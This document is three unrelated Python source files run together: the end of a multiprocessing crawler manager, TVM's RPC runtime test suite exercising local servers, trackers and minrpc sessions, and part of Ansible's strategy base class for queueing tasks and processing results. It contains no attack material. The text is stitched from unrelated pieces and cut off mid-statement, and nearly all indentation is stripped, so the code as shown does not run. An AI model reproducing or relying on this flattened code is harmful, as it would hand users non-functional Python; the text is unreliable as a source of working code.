result_solve_proc = Process(target=node.result_solve_proc, args=(result_q, conn_q, store_q))
store_proc = Process(target=node.store_proc, args=(store_q,))
    # Start the three processes and the distributed manager
url_manager_proc.start()
result_solve_proc.start()
store_proc.start()
print('init finish.')
manager.get_server().serve_forever()
if __name__ == '__main__':
main()
|
test_runtime_rpc.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import te
import tvm.testing
import logging
import multiprocessing
import os
import stat
import sys
import time
import pytest
import numpy as np
from tvm import rpc
from tvm.contrib import utils, cc
from tvm.rpc.tracker import Tracker
if __name__ == "__main__":
# NOTE: must live here to avoid registering PackedFunc with libtvm.so twice.
sys.exit(pytest.main([__file__] + sys.argv[1:]))
# tkonolige: The issue as I understand it is this: multiprocessing's spawn
# method launches a new process and then imports the relevant modules. This
# means that all registered functions must exist at the top level scope. In
# this file they are, so all is well when we run this file directly.
# However, when run under pytest, the functions aren't registered on the
# server. I believe this is because pytest is also using multiprocessing to
# run individual functions. Somewhere along the way, the imports are being
# lost, so the server ends up not registering the functions.
pytestmark = pytest.mark.skipif(
    # Windows does not support fork, so this check only applies on non-Windows platforms.
    not sys.platform.startswith("win") and multiprocessing.get_start_method() != "fork",
reason=(
"pytest + multiprocessing spawn method causes tvm.register_func to "
"not work on the rpc.Server."
),
)
@tvm.testing.requires_rpc
def test_bigendian_rpc():
"""Test big endian rpc when there is a PowerPC RPC server available"""
host = os.environ.get("TVM_POWERPC_TEST_HOST", None)
port = os.environ.get("TVM_POWERPC_TEST_PORT", 9090)
if host is None:
return
def verify_rpc(remote, target, shape, dtype):
A = te.placeholder(shape, dtype=dtype)
B = te.compute(A.shape, lambda i: A[i] + tvm.tir.const(1, A.dtype))
s = te.create_schedule(B.op)
f = tvm.build(s, [A, B], target, name="myadd")
dev = remote.cpu(0)
a = tvm.nd.array(np.random.randint(0, 256, size=shape).astype(A.dtype), device=dev)
b = tvm.nd.array(np.zeros(shape).astype(A.dtype), device=dev)
temp = utils.tempdir()
path_dso = temp.relpath("dev_lib.o")
f.save(path_dso)
remote.upload(path_dso)
f = remote.load_module("dev_lib.o")
f(a, b)
tvm.testing.assert_allclose(a.numpy() + 1, b.numpy())
print("Test RPC connection to PowerPC...")
remote = rpc.connect(host, port)
target = "llvm -mtriple=powerpc-linux-gnu"
for dtype in ["float32", "float64", "int32", "int8"]:
verify_rpc(remote, target, (10,), dtype)
@tvm.testing.requires_rpc
def test_rpc_simple():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
f1 = client.get_function("rpc.test.addone")
assert f1(10) == 11
f3 = client.get_function("rpc.test.except")
with pytest.raises(tvm._ffi.base.TVMError):
f3("abc")
f2 = client.get_function("rpc.test.strcat")
assert f2("abc", 11) == "abc:11"
@tvm.testing.requires_rpc
def test_rpc_runtime_string():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
func = client.get_function("rpc.test.runtime_str_concat")
x = tvm.runtime.container.String("abc")
y = tvm.runtime.container.String("def")
assert str(func(x, y)) == "abcdef"
@tvm.testing.requires_rpc
def test_rpc_array():
x = np.ones((3, 4))
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
r_cpu = tvm.nd.array(x, remote.cpu(0))
assert str(r_cpu.device).startswith("remote")
np.testing.assert_equal(r_cpu.numpy(), x)
fremote = remote.get_function("rpc.test.remote_array_func")
fremote(r_cpu)
@tvm.testing.requires_rpc
def test_rpc_large_array():
    # test case for large array creation
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
dev = remote.cpu(0)
a_np = np.ones((5041, 720)).astype("float32")
b_np = np.ones((720, 192)).astype("float32")
a = tvm.nd.array(a_np, dev)
b = tvm.nd.array(b_np, dev)
np.testing.assert_equal(a.numpy(), a_np)
np.testing.assert_equal(b.numpy(), b_np)
@tvm.testing.requires_rpc
def test_rpc_echo():
def check(remote):
fecho = remote.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
with pytest.raises(RuntimeError):
raise_err = remote.get_function("testing.test_raise_error_callback")("RuntimeError")
raise_err()
remote.cpu().sync()
with pytest.raises(AttributeError):
f3 = remote.system_lib()["notexist"]
temp = rpc.server._server_env([])
server = rpc.Server()
client = rpc.connect("127.0.0.1", server.port)
check(rpc.LocalSession())
check(client)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# Test minrpc server.
temp = utils.tempdir()
minrpc_exec = temp.relpath("minrpc")
tvm.rpc.with_minrpc(cc.create_executable)(minrpc_exec, [])
check(rpc.PopenSession(minrpc_exec))
# minrpc on the remote
server = rpc.Server()
client = rpc.connect(
"127.0.0.1",
server.port,
session_constructor_args=["rpc.PopenSession", open(minrpc_exec, "rb").read()],
)
check(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_file_exchange():
server = rpc.Server()
remote = rpc.connect("127.0.0.1", server.port)
blob = bytearray(np.random.randint(0, 10, size=(10)))
remote.upload(blob, "dat.bin")
rev = remote.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
@tvm.testing.requires_llvm
def test_rpc_remote_module():
# graph
n = tvm.runtime.convert(102)
A = te.placeholder((n,), name="A")
B = te.compute(A.shape, lambda *i: A(*i) + 1.0, name="B")
s = te.create_schedule(B.op)
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1"],
)
def check_remote(remote):
temp = utils.tempdir()
dev = remote.cpu(0)
f = tvm.build(s, [A, B], "llvm", name="myadd")
path_dso = temp.relpath("dev_lib.so")
f.export_library(path_dso)
remote.upload(path_dso)
f1 = remote.load_module("dev_lib.so")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator(f1.entry_name, remote.cpu(0), number=10)
cost = time_f(a, b).mean
print("%g secs/op" % cost)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# Download the file from the remote
path_tar = temp.relpath("dev_lib.tar")
f.export_library(path_tar)
remote.upload(path_tar)
local_download_path = temp.relpath("dev_lib.download.so")
with open(local_download_path, "wb") as fo:
fo.write(remote.download_linked_module("dev_lib.tar"))
fupdated = tvm.runtime.load_module(local_download_path)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), tvm.cpu(0))
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), tvm.cpu(0))
fupdated(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
def check_minrpc():
if tvm.get_global_func("rpc.CreatePipeClient", allow_missing=True) is None:
return
# export to minrpc
temp = utils.tempdir()
f = tvm.build(s, [A, B], "llvm --system-lib", name="myadd")
path_minrpc = temp.relpath("dev_lib.minrpc")
f.export_library(path_minrpc, rpc.with_minrpc(cc.create_executable))
with pytest.raises(RuntimeError):
rpc.PopenSession("filenotexist")
        # start the minrpc session.
remote = tvm.rpc.PopenSession(path_minrpc)
dev = remote.cpu(0)
f1 = remote.system_lib()
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
time_f = f1.time_evaluator("myadd", remote.cpu(0), number=1)
cost = time_f(a, b).mean
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# change to not executable
os.chmod(path_minrpc, stat.S_IRUSR)
with pytest.raises(RuntimeError):
rpc.PopenSession(path_minrpc)
def check_remote_link_cl(remote):
"""Test function to run remote code such as cl
This is not enabled because there is forking issue
of TVM runtime when server launches after OpenCL
runtime initializes. We leave it as an example
on how to do rpc when we want to do linking on remote.
"""
if not tvm.testing.device_enabled("opencl"):
print("Skip because opencl is not enabled")
return
temp = utils.tempdir()
dev = remote.cl(0)
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=32)
s[B].bind(xo, te.thread_axis("blockIdx.x"))
s[B].bind(xi, te.thread_axis("threadIdx.x"))
f = tvm.build(s, [A, B], "opencl --host=llvm", name="myadd")
# Option 1: save modules separately and rely on remote compiler
path_o = temp.relpath("myadd.o")
path_cl = temp.relpath("myadd.cl")
path_json = temp.relpath("myadd.tvm_meta.json")
f.save(path_o)
f.imported_modules[0].save(path_cl)
remote.upload(path_o)
remote.upload(path_cl)
# upload meta data
remote.upload(path_json)
fhost = remote.load_module("myadd.o")
fdev = remote.load_module("myadd.cl")
fhost.import_module(fdev)
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
# Option 2: export library as a tar ball then handled by remote compiler
path_tar = temp.relpath("myadd.tar")
f.export_library(path_tar)
remote.upload(path_tar)
fhost = remote.load_module("myadd.tar")
a = tvm.nd.array(np.random.uniform(size=102).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(102, dtype=A.dtype), dev)
fhost(a, b)
np.testing.assert_equal(b.numpy(), a.numpy() + 1)
check_remote(rpc.LocalSession())
check_remote(client)
check_minrpc()
@tvm.testing.requires_rpc
def test_rpc_return_func():
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
@tvm.testing.requires_rpc
def test_rpc_session_constructor_args():
# start server
server0 = rpc.Server(key="x0")
server1 = rpc.Server(key="x1")
def check_multi_hop():
# use server0 as proxy to connect to server1
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.Connect", "127.0.0.1", server1.port, "x1"],
)
fecho = client.get_function("testing.echo")
assert fecho(1, 2, 3) == 1
assert fecho(100, 2, 3) == 100
assert fecho("xyz") == "xyz"
assert bytes(fecho(bytearray(b"123"))) == b"123"
nd = tvm.nd.array([1, 2, 3], device=client.cpu(0))
assert nd.numpy()[1] == 2
def check_error_handling():
with pytest.raises(tvm.error.RPCError):
client = rpc.connect(
"127.0.0.1",
server0.port,
key="x0",
session_constructor_args=["rpc.NonExistingConstructor"],
)
check_multi_hop()
check_error_handling()
@tvm.testing.requires_rpc
def test_rpc_return_ndarray():
# start server
server = rpc.Server(key="x1")
client = rpc.connect("127.0.0.1", server.port, key="x1")
m = client.get_function("rpc.test.remote_return_nd")
get_arr = m("get_arr")
ref_count = m("ref_count")
get_elem = m("get_elem")
get_arr_elem = m("get_arr_elem")
# array test
def run_arr_test():
arr = get_arr()
assert get_elem(0) == 0.0
assert get_arr_elem(arr, 0) == 0.0
run_arr_test()
@tvm.testing.requires_rpc
def test_local_func():
client = rpc.LocalSession()
f1 = client.get_function("rpc.test.add_to_lhs")
fadd = f1(10)
assert fadd(12) == 22
blob = bytearray(np.random.randint(0, 10, size=(10)))
client.upload(blob, "dat.bin")
rev = client.download("dat.bin")
assert rev == blob
@tvm.testing.requires_rpc
def test_rpc_tracker_register():
# test registration
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server1 = rpc.Server(
host="127.0.0.1",
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
server2 = rpc.Server(
host="127.0.0.1",
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
custom_addr="test_addr", # this is a test address, which is unable to connect
)
time.sleep(1)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
def exist_address(summary, key, host, port):
server_info = summary["server_info"]
for device in server_info:
if device["key"] == "server:%s" % key:
addr = device["addr"]
if (host is None or host == addr[0]) and port == addr[1]:
return True
return False
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 2
assert exist_address(summary, device_key, "127.0.0.1", server1.port)
assert exist_address(summary, device_key, "test_addr", server2.port)
remote = client.request(device_key)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
del remote
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 2
server1.terminate()
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 1
assert not exist_address(summary, device_key, "127.0.0.1", server1.port)
assert exist_address(summary, device_key, "test_addr", server2.port)
server2.terminate()
time.sleep(1)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert not exist_address(summary, device_key, "test_addr", server2.port)
tracker.terminate()
def _target(host, port, device_key, timeout):
client = rpc.connect_tracker(host, port)
remote = client.request(device_key, session_timeout=timeout)
while True:
pass
remote.cpu()
@tvm.testing.requires_rpc
def test_rpc_tracker_request():
# test concurrent request
tracker = Tracker(port=9000, port_end=10000)
device_key = "test_device"
server = rpc.Server(
port=9000,
port_end=10000,
key=device_key,
tracker_addr=("127.0.0.1", tracker.port),
)
client = rpc.connect_tracker("127.0.0.1", tracker.port)
proc1 = multiprocessing.Process(target=_target, args=("127.0.0.1", tracker.port, device_key, 4))
proc2 = multiprocessing.Process(
target=_target, args=("127.0.0.1", tracker.port, device_key, 200)
)
proc1.start()
time.sleep(0.5)
proc2.start()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 1
proc1.terminate()
proc1.join()
time.sleep(0.5)
summary = client.summary()
assert summary["queue_info"][device_key]["free"] == 0
assert summary["queue_info"][device_key]["pending"] == 0
proc2.terminate()
proc2.join()
server.terminate()
tracker.terminate()
|
__init__.py
|
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import cmd
import functools
import os
import pprint
import sys
import threading
import time
from collections import deque
from multiprocessing import Lock
from jinja2.exceptions import UndefinedError
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleParserError, AnsibleUndefinedVariable
from ansible.executor import action_write_locks
from ansible.executor.process.worker import WorkerProcess
from ansible.executor.task_result import TaskResult
from ansible.inventory.host import Host
from ansible.module_utils.six.moves import queue as Queue
from ansible.module_utils.six import iteritems, itervalues, string_types
from ansible.module_utils._text import to_text
from ansible.module_utils.connection import Connection, ConnectionError
from ansible.playbook.helpers import load_list_of_blocks
from ansible.playbook.included_file import IncludedFile
from ansible.playbook.task_include import TaskInclude
from ansible.playbook.role_include import IncludeRole
from ansible.plugins.loader import action_loader, connection_loader, filter_loader, lookup_loader, module_loader, test_loader
from ansible.template import Templar
from ansible.utils.vars import combine_vars
from ansible.vars.clean import strip_internal_keys
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
__all__ = ['StrategyBase']
class StrategySentinel:
pass
# TODO: this should probably be in the plugins/__init__.py, with
# a smarter mechanism to set all of the attributes based on
# the loaders created there
class SharedPluginLoaderObj:
'''
    A simple object to make passing the various plugin loaders to
    the forked processes over the queue easier.
'''
def __init__(self):
self.action_loader = action_loader
self.connection_loader = connection_loader
self.filter_loader = filter_loader
self.test_loader = test_loader
self.lookup_loader = lookup_loader
self.module_loader = module_loader
_sentinel = StrategySentinel()
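# Sentinel object placed on the final results queue by cleanup() so that the
# background results thread (results_thread_main) knows it should exit.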
def results_thread_main(strategy):
while True:
try:
result = strategy._final_q.get()
if isinstance(result, StrategySentinel):
break
else:
strategy._results_lock.acquire()
strategy._results.append(result)
strategy._results_lock.release()
except (IOError, EOFError):
break
except Queue.Empty:
pass
def debug_closure(func):
"""Closure to wrap ``StrategyBase._process_pending_results`` and invoke the task debugger"""
@functools.wraps(func)
def inner(self, iterator, one_pass=False, max_passes=None):
status_to_stats_map = (
('is_failed', 'failures'),
('is_unreachable', 'dark'),
('is_changed', 'changed'),
('is_skipped', 'skipped'),
)
# We don't know the host yet, copy the previous states, for lookup after we process new results
prev_host_states = iterator._host_states.copy()
results = func(self, iterator, one_pass=one_pass, max_passes=max_passes)
_processed_results = []
for result in results:
task = result._task
host = result._host
_queued_task_args = self._queued_task_cache.pop((host.name, task._uuid), None)
task_vars = _queued_task_args['task_vars']
play_context = _queued_task_args['play_context']
# Try to grab the previous host state, if it doesn't exist use get_host_state to generate an empty state
try:
prev_host_state = prev_host_states[host.name]
except KeyError:
prev_host_state = iterator.get_host_state(host)
while result.needs_debugger(globally_enabled=self.debugger_active):
next_action = NextAction()
dbg = Debugger(task, host, task_vars, play_context, result, next_action)
dbg.cmdloop()
if next_action.result == NextAction.REDO:
# rollback host state
self._tqm.clear_failed_hosts()
iterator._host_states[host.name] = prev_host_state
for method, what in status_to_stats_map:
if getattr(result, method)():
self._tqm._stats.decrement(what, host.name)
self._tqm._stats.decrement('ok', host.name)
# redo
self._queue_task(host, task, task_vars, play_context)
_processed_results.extend(debug_closure(func)(self, iterator, one_pass))
break
elif next_action.result == NextAction.CONTINUE:
_processed_results.append(result)
break
elif next_action.result == NextAction.EXIT:
# Matches KeyboardInterrupt from bin/ansible
sys.exit(99)
else:
_processed_results.append(result)
return _processed_results
return inner
class StrategyBase:
'''
This is the base class for strategy plugins, which contains some common
code useful to all strategies like running handlers, cleanup actions, etc.
'''
def __init__(self, tqm):
self._tqm = tqm
self._inventory = tqm.get_inventory()
self._workers = tqm.get_workers()
self._notified_handlers = tqm._notified_handlers
self._listening_handlers = tqm._listening_handlers
self._variable_manager = tqm.get_variable_manager()
self._loader = tqm.get_loader()
self._final_q = tqm._final_q
self._step = getattr(tqm._options, 'step', False)
self._diff = getattr(tqm._options, 'diff', False)
self.flush_cache = getattr(tqm._options, 'flush_cache', False)
# the task cache is a dictionary of tuples of (host.name, task._uuid)
# used to find the original task object of in-flight tasks and to store
# the task args/vars and play context info used to queue the task.
self._queued_task_cache = {}
# Backwards compat: self._display isn't really needed, just import the global display and use that.
self._display = display
# internal counters
self._pending_results = 0
self._cur_worker = 0
# this dictionary is used to keep track of hosts that have
# outstanding tasks still in queue
self._blocked_hosts = dict()
self._results = deque()
self._results_lock = threading.Condition(threading.Lock())
# create the result processing thread for reading results in the background
self._results_thread = threading.Thread(target=results_thread_main, args=(self,))
self._results_thread.daemon = True
self._results_thread.start()
# holds the list of active (persistent) connections to be shutdown at
# play completion
self._active_connections = dict()
self.debugger_active = C.ENABLE_TASK_DEBUGGER
def cleanup(self):
# close active persistent connections
for sock in itervalues(self._active_connections):
try:
conn = Connection(sock)
conn.reset()
except ConnectionError as e:
# most likely socket is already closed
display.debug("got an error while closing persistent connection: %s" % e)
self._final_q.put(_sentinel)
self._results_thread.join()
def run(self, iterator, play_context, result=0):
# execute one more pass through the iterator without peeking, to
# make sure that all of the hosts are advanced to their final task.
# This should be safe, as everything should be ITERATING_COMPLETE by
# this point, though the strategy may not advance the hosts itself.
[iterator.get_next_task_for_host(host) for host in self._inventory.get_hosts(iterator._play.hosts) if host.name not in self._tqm._unreachable_hosts]
# save the failed/unreachable hosts, as the run_handlers()
# method will clear that information during its execution
failed_hosts = iterator.get_failed_hosts()
unreachable_hosts = self._tqm._unreachable_hosts.keys()
display.debug("running handlers")
handler_result = self.run_handlers(iterator, play_context)
if isinstance(handler_result, bool) and not handler_result:
result |= self._tqm.RUN_ERROR
elif not handler_result:
result |= handler_result
# now update with the hosts (if any) that failed or were
# unreachable during the handler execution phase
failed_hosts = set(failed_hosts).union(iterator.get_failed_hosts())
unreachable_hosts = set(unreachable_hosts).union(self._tqm._unreachable_hosts.keys())
        # return the appropriate code, depending on the status of hosts after the run
if not isinstance(result, bool) and result != self._tqm.RUN_OK:
return result
elif len(unreachable_hosts) > 0:
return self._tqm.RUN_UNREACHABLE_HOSTS
elif len(failed_hosts) > 0:
return self._tqm.RUN_FAILED_HOSTS
else:
return self._tqm.RUN_OK
def get_hosts_remaining(self, play):
return [host for host in self._inventory.get_hosts(play.hosts)
if host.name not in self._tqm._failed_hosts and host.name not in self._tqm._unreachable_hosts]
def get_failed_hosts(self, play):
return [host for host in self._inventory.get_hosts(play.hosts) if host.name in self._tqm._failed_hosts]
def add_tqm_variables(self, vars, play):
'''
Base class method to add extra variables/information to the list of task
vars sent through the executor engine regarding the task queue manager state.
'''
vars['ansible_current_hosts'] = [h.name for h in self.get_hosts_remaining(play)]
vars['ansible_failed_hosts'] = [h.name for h in self.get_failed_hosts(play)]
def _queue_task(self, host, task, task_vars, play_context):
''' handles queueing the task up to be sent to a worker '''
display.debug("entering _queue_task() for %s/%s" % (host.name, task.action))
# Add a write lock for tasks.
# Maybe this should be added somewhere further up the call stack but
# this is the earliest in the code where we have task (1) extracted
# into its own variable and (2) there's only a single code path
# leading to the module being run. This is called by three
# functions: __init__.py::_do_handler_run(), linear.py::run(), and
# free.py::run() so we'd have to add to all three to do it there.
# The next common higher level is __init__.py::run() and that has
# tasks inside of play_iterator so we'd have to extract them to do it
# there.
if task.action not in action_write_locks.action_write_locks:
display.debug('Creating lock for %s' % task.action)
action_write_locks.action_write_locks[task.action] = Lock()
# and then queue the new task
try:
# create a dummy object with plugin loaders set as an easier
# way to share them with the forked processes
shared_loader_obj = SharedPluginLoaderObj()
queued = False
starting_worker = self._cur_worker
while True:
(worker_prc, rslt_q) = self._workers[self._cur_worker]
if worker_prc is None or not worker_prc.is_alive():
self._queued_task_cache[(host.name, task._uuid)] = {
'host': host,
'task': task,
'task_vars': task_vars,
'play_context': play_context
}
worker_prc = WorkerProcess(self._final_q, task_vars, host, task, play_context, self._loader, self._variable_manager, shared_loader_obj)
self._workers[self._cur_worker][0] = worker_prc
worker_prc.start()
display.debug("worker is %d (out of %d available)" % (self._cur_worker + 1, len(self._workers)))
queued = True
self._cur_worker += 1
if self._cur_worker >= len(self._workers):
self._cur_worker = 0
if queued:
break
elif self._cur_worker == starting_worker:
time.sleep(0.0001)
self._pending_results += 1
except (EOFError, IOError, AssertionError) as e:
# most likely an abort
display.debug("got an error while queuing: %s" % e)
return
display.debug("exiting _queue_task() for %s/%s" % (host.name, task.action))
def get_task_hosts(self, iterator, task_host, task):
if task.run_once:
host_list = [host for host in self._inventory.get_hosts(iterator._play.hosts) if host.name not in self._tqm._unreachable_hosts]
else:
host_list = [task_host]
return host_list
def get_delegated_hosts(self, result, task):
host_name = result.get('_ansible_delegated_vars', {}).get('ansible_delegated_host', None)
if host_name is not None:
actual_host = self._inventory.get_host(host_name)
if actual_host is None:
actual_host = Host(name=host_name)
else:
actual_host = Host(name=task.delegate_to)
return [actual_host]
@debug_closure
def _process_pending_results(self, iterator, one_pass=False, max_passes=None):
'''
Reads results off the final queue and takes appropriate action
based on the result (executing callbacks, updating state, etc.).
'''
ret_results = []
def get_original_host(host_name):
# FIXME: this should not need x2 _inventory
host_name = to_text(host_name)
if host_name in self._inventory.hosts:
return self._inventory.hosts[host_name]
else:
return self._inventory.get_host(host_name)
def search_handler_blocks_by_name(handler_name, handler_blocks):
for handler_block in handler_blocks:
for handler_task in handler_block.block:
if handler_task.name:
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=handler_task)
templar = Templar(loader=self._loader, variables=handler_vars)
try:
# first we check with the full result of get_name(), which may
# include the role name (if the handler is from a role). If that
# is not found, we resort to the simple name field, which doesn't
# have anything extra added to it.
target_handler_name = templar.template(handler_task.name)
if target_handler_name == handler_name:
return handler_task
else:
target_handler_name = templar.template(handler_task.get_name())
if target_handler_name == handler_name:
return handler_task
except (UndefinedError, AnsibleUndefinedVariable):
# We skip this handler due to the fact that it may be using
# a variable in the name that was conditionally included via
# set_fact or some other method, and we don't want to error
# out unnecessarily
continue
return None
def search_handler_blocks_by_uuid(handler_uuid, handler_blocks):
for handler_block in handler_blocks:
for handler_task in handler_block.block:
if handler_uuid == handler_task._uuid:
return handler_task
return None
def parent_handler_match(target_handler, handler_name):
if target_handler:
if isinstance(target_handler, (TaskInclude, IncludeRole)):
try:
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=target_handler)
templar = Templar(loader=self._loader, variables=handler_vars)
target_handler_name = templar.template(target_handler.name)
if target_handler_name == handler_name:
return True
else:
target_handler_name = templar.template(target_handler.get_name())
if target_handler_name == handler_name:
return True
except (UndefinedError, AnsibleUndefinedVariable):
pass
return parent_handler_match(target_handler._parent, handler_name)
else:
return False
cur_pass = 0
while True:
try:
self._results_lock.acquire()
task_result = self._results.popleft()
except IndexError:
break
finally:
self._results_lock.release()
# get the original host and task. We then assign them to the TaskResult for use in callbacks/etc.
original_host = get_original_host(task_result._host)
queue_cache_entry = (original_host.name, task_result._task)
found_task = self._queued_task_cache.get(queue_cache_entry)['task']
original_task = found_task.copy(exclude_parent=True, exclude_tasks=True)
original_task._parent = found_task._parent
original_task.from_attrs(task_result._task_fields)
task_result._host = original_host
task_result._task = original_task
# send callbacks for 'non final' results
if '_ansible_retry' in task_result._result:
self._tqm.send_callback('v2_runner_retry', task_result)
continue
elif '_ansible_item_result' in task_result._result:
if task_result.is_failed() or task_result.is_unreachable():
self._tqm.send_callback('v2_runner_item_on_failed', task_result)
elif task_result.is_skipped():
self._tqm.send_callback('v2_runner_item_on_skipped', task_result)
else:
if 'diff' in task_result._result:
if self._diff or getattr(original_task, 'diff', False):
self._tqm.send_callback('v2_on_file_diff', task_result)
self._tqm.send_callback('v2_runner_item_on_ok', task_result)
continue
if original_task.register:
host_list = self.get_task_hosts(iterator, original_host, original_task)
clean_copy = strip_internal_keys(task_result._result)
if 'invocation' in clean_copy:
del clean_copy['invocation']
for target_host in host_list:
self._variable_manager.set_nonpersistent_facts(target_host, {original_task.register: clean_copy})
# all host status messages contain 2 entries: (msg, task_result)
role_ran = False
if task_result.is_failed():
role_ran = True
ignore_errors = original_task.ignore_errors
if not ignore_errors:
display.debug("marking %s as failed" % original_host.name)
if original_task.run_once:
# if we're using run_once, we have to fail every host here
for h in self._inventory.get_hosts(iterator._play.hosts):
if h.name not in self._tqm._unreachable_hosts:
state, _ = iterator.get_next_task_for_host(h, peek=True)
iterator.mark_host_failed(h)
state, new_task = iterator.get_next_task_for_host(h, peek=True)
else:
iterator.mark_host_failed(original_host)
# increment the failed count for this host
self._tqm._stats.increment('failures', original_host.name)
# grab the current state and if we're iterating on the rescue portion
# of a block then we save the failed task in a special var for use
# within the rescue/always
state, _ = iterator.get_next_task_for_host(original_host, peek=True)
if iterator.is_failed(original_host) and state and state.run_state == iterator.ITERATING_COMPLETE:
self._tqm._failed_hosts[original_host.name] = True
if state and iterator.get_active_state(state).run_state == iterator.ITERATING_RESCUE:
self._variable_manager.set_nonpersistent_facts(
original_host,
dict(
ansible_failed_task=original_task.serialize(),
ansible_failed_result=task_result._result,
),
)
else:
self._tqm._stats.increment('ok', original_host.name)
if 'changed' in task_result._result and task_result._result['changed']:
self._tqm._stats.increment('changed', original_host.name)
self._tqm.send_callback('v2_runner_on_failed', task_result, ignore_errors=ignore_errors)
elif task_result.is_unreachable():
self._tqm._unreachable_hosts[original_host.name] = True
iterator._play._removed_hosts.append(original_host.name)
self._tqm._stats.increment('dark', original_host.name)
self._tqm.send_callback('v2_runner_on_unreachable', task_result)
elif task_result.is_skipped():
self._tqm._stats.increment('skipped', original_host.name)
self._tqm.send_callback('v2_runner_on_skipped', task_result)
else:
role_ran = True
if original_task.loop:
# this task had a loop, and has more than one result, so
# loop over all of them instead of a single result
result_items = task_result._result.get('results', [])
else:
result_items = [task_result._result]
for result_item in result_items:
if '_ansible_notify' in result_item:
if task_result.is_changed():
# The shared dictionary for notified handlers is a proxy, which
# does not detect when sub-objects within the proxy are modified.
# So, per the docs, we reassign the list so the proxy picks up and
# notifies all other threads
for handler_name in result_item['_ansible_notify']:
found = False
# Find the handler using the above helper. First we look up the
# dependency chain of the current task (if it's from a role), otherwise
# we just look through the list of handlers in the current play/all
# roles and use the first one that matches the notify name
target_handler = search_handler_blocks_by_name(handler_name, iterator._play.handlers)
if target_handler is not None:
found = True
if target_handler._uuid not in self._notified_handlers:
self._notified_handlers[target_handler._uuid] = []
if original_host not in self._notified_handlers[target_handler._uuid]:
self._notified_handlers[target_handler._uuid].append(original_host)
self._tqm.send_callback('v2_playbook_on_notify', target_handler, original_host)
else:
                                    # There may be more than one handler with the notified name as the
                                    # parent, so we just keep track of whether or not we found one at all.
for target_handler_uuid in self._notified_handlers:
target_handler = search_handler_blocks_by_uuid(target_handler_uuid, iterator._play.handlers)
if target_handler and parent_handler_match(target_handler, handler_name):
found = True
if original_host not in self._notified_handlers[target_handler._uuid]:
self._notified_handlers[target_handler._uuid].append(original_host)
self._tqm.send_callback('v2_playbook_on_notify', target_handler, original_host)
if handler_name in self._listening_handlers:
for listening_handler_uuid in self._listening_handlers[handler_name]:
listening_handler = search_handler_blocks_by_uuid(listening_handler_uuid, iterator._play.handlers)
if listening_handler is not None:
found = True
else:
continue
if original_host not in self._notified_handlers[listening_handler._uuid]:
